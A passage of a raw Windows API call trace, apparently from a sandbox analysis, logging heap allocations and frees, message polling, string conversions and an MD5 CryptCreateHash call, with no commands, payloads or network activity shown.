returned 0x2e50fe0 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.966] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.966] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0234.966] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0234.966] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.966] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0234.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51478, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0234.967] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0234.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0234.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0234.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0234.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f88 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0234.972] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0234.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0234.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0234.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0234.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0234.974] HeapFree (in: hHeap=0x970000, 